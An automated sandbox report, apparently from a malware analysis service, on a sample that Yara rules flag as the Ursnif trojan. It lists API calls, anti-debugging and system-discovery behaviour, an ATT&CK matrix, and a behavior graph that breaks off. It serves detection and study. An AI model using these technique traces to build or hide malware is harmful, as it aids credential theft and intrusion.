            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00AE57FE Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,1_2_00AE57FE
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6E5915A0 FindFirstFileExA,1_2_6E5915A0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_012757FE Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,2_2_012757FE
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_033D57FE Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,3_2_033D57FE
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6E56CA50 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6E56CA50
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6E58B1B0 __invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__cftoe,__aligned_msize,__invoke_watson_if_error,GetFileType,WriteConsoleW,GetLastError,__cftoe,WriteFile,WriteFile,OutputDebugStringW,__invoke_watson_if_error,__CrtDbgReportWV,1_2_6E58B1B0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6E57AEA0 mov ecx, dword ptr fs:[00000030h]1_2_6E57AEA0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6E5C044E mov eax, dword ptr fs:[00000030h]1_2_6E5C044E
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6E5BFF8E push dword ptr fs:[00000030h]1_2_6E5BFF8E
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6E5C0384 mov eax, dword ptr fs:[00000030h]1_2_6E5C0384
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6E56CA50 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6E56CA50
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6E571350 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6E571350
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6E56CBA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_6E56CBA0
            Source: rundll32.exe, 00000001.00000002.631790597.00000000032E0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: rundll32.exe, 00000001.00000002.631790597.00000000032E0000.00000002.00000001.sdmpBinary or memory string: NProgram Manager
            Source: rundll32.exe, 00000001.00000002.631790597.00000000032E0000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: rundll32.exe, 00000001.00000002.631790597.00000000032E0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00AE91E5 cpuid 1_2_00AE91E5
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,1_2_6E541000
            Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6E5410A9 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,1_2_6E5410A9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00AE91E5 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,1_2_00AE91E5
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6E58D660 __invoke_watson_if_error,__invoke_watson_if_error,__invoke_watson_if_error,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,1_2_6E58D660
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6E541CE2 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,1_2_6E541CE2

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.549314846.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549441355.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549287062.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549382541.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549424354.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549246941.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549408026.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.632769981.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549346678.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6768, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.549314846.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549441355.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549287062.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549382541.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549424354.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549246941.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549408026.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.632769981.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549346678.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6768, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation1DLL Side-Loading1Process Injection2Masquerading1OS Credential DumpingSystem Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobApplication Shimming1DLL Side-Loading1Process Injection2LSASS MemorySecurity Software Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Application Shimming1Obfuscated Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Rundll321NTDSAccount Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsSystem Owner/User Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery33Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 288964 Sample: plushaaf Startdate: 23/09/2020 Architecture: WINDOWS Score: 80 24 Multi AV Scanner detection for domain / URL 2->24 26 Found malware configuration 2->26 28 Antivirus detection for URL or domain 2->28 30 Yara detected  Ursnif 2->30 6 loaddll32.exe 1 2->6         started        8 iexplore.exe 10 84 2->8         started        process3 process4 10 rundll32.exe 6->10         started        13